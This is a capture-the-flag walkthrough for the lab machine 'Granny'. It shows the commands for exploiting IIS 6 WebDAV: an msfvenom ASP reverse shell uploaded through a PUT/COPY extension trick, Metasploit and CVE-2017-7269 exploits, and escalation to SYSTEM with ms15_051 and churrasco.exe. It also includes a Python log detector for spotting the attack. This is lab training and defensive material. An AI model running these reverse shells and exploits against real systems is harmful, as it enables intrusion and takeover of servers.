echo "10.129.150.175 granny.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.150.175 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA granny 10.129.150.175

nmap -sU -O -p- -oA granny-udp 10.129.150.175

nikto -h 10.129.150.175:80

gobuster dir -k -u http://10.129.150.175/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

We see that PUT is among the HTTP methods the server allows.

We use davtest: https://github.com/cldrn/davtest

perl davtest.pl -url http://granny.htb -move -copy -cleanup

From the output of the previous command we can conclude that if we upload a .txt file and then COPY it, the copy can end up with an .asp extension, and the server executes it as an ASP file.

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=9999 -f asp > granny_shell.asp.txt

$ cadaver http://granny.htb/ 
dav:/> put granny_shell.asp.txt
dav:/> copy granny_shell.asp.txt granny_shell.asp;.txt

rlwrap nc -lvnp 9999

curl http://granny.htb/granny_shell.asp;.txt

This reverse shell only lasts about 2 seconds and is no use to me.
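From the defender's side, the PUT, COPY and GET sequence above leaves a clear trace in the IIS W3C log. The following is an added example, not part of the original writeup, that parses such a log and flags successful WebDAV writes, an upload followed by a COPY/MOVE of the same path from one client, and any request for a script extension hidden behind a ';'. The log lines, client IPs and timestamps are constructed.

```python
"""Flag WebDAV upload-and-rename abuse in IIS W3C logs (added example)."""
import re
from collections import defaultdict

# Constructed sample: IIS 6 W3C log lines mirroring the PUT -> COPY -> GET
# sequence from the walkthrough. Client IPs and timestamps are made up.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2021-05-12 14:02:10 10.129.150.175 PROPFIND / - 80 - 10.10.14.5 cadaver/0.23.3 207 0 0
2021-05-12 14:02:40 10.129.150.175 PUT /granny_shell.asp.txt - 80 - 10.10.14.5 cadaver/0.23.3 201 0 0
2021-05-12 14:02:59 10.129.150.175 COPY /granny_shell.asp.txt - 80 - 10.10.14.5 cadaver/0.23.3 201 0 0
2021-05-12 14:03:30 10.129.150.175 GET /granny_shell.asp;.txt - 80 - 10.10.14.5 curl/7.74.0 200 0 0
2021-05-12 14:05:01 10.129.150.175 GET /index.htm - 80 - 10.10.14.9 Mozilla/5.0 200 0 0
"""

# WebDAV methods that modify content; a 2xx on any of these from an
# untrusted client is worth an alert on a site that should be read-only.
WRITE_METHODS = {"PUT", "COPY", "MOVE", "MKCOL", "DELETE", "PROPPATCH"}
# Script-mapped IIS 6 extensions followed by ';': the parsing quirk that
# makes 'shell.asp;.txt' run as ASP while looking like a text file.
SEMICOLON_EXT = re.compile(r"\.(asp|aspx|asa|cer|cdx);", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per entry, naming columns from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def find_webdav_abuse(text):
    """Return (rule, client_ip, method, uri) tuples for suspicious entries."""
    alerts = []
    uploaded = defaultdict(set)  # client ip -> paths it PUT successfully
    for e in parse_w3c(text):
        method, uri, ip = e["cs-method"], e["cs-uri-stem"], e["c-ip"]
        ok = e["sc-status"].startswith("2")
        if method in WRITE_METHODS and ok:
            alerts.append(("webdav_write", ip, method, uri))
        if method == "PUT" and ok:
            uploaded[ip].add(uri)
        # Upload followed by COPY/MOVE of the same file: rename-to-execute.
        if method in ("COPY", "MOVE") and uri in uploaded[ip]:
            alerts.append(("upload_then_rename", ip, method, uri))
        if SEMICOLON_EXT.search(uri):
            alerts.append(("semicolon_extension", ip, method, uri))
    return alerts
```

The default W3C fields do not record the Destination header of a COPY, so the new name only becomes visible when the renamed file is requested, which is what the semicolon rule catches.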

meterpreter > background
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST tun0
msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit
msf6 exploit(windows/local/ms15_051_client_copy_image) > sessions -i 1
meterpreter > ps
meterpreter > migrate 1816
meterpreter > background
msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit
meterpreter > getuid

To do it OSCP-style, without Metasploit, we clone this onto our Kali machine:

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

python iis\ reverse\ shell 10.129.178.6 80 10.10.14.135 443

nc -lvnp 443

cd %temp%

mkdir privesc

cd privesc

systeminfo

We download churrasco.exe from this page:

https://binaryregion.wordpress.com/2021/08/04/privilege-escalation-windows-churrasco-exe/

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support

copy \\10.10.xx.xx\smbFolder\churrasco.exe churrasco.exe

churrasco.exe "type C:\DOCUME~1\Lakis\Desktop\user.txt"

churrasco.exe "type C:\DOCUME~1\Administrator\Desktop\root.txt"

Copyright © 2022 Cu3rv0x. All rights reserved.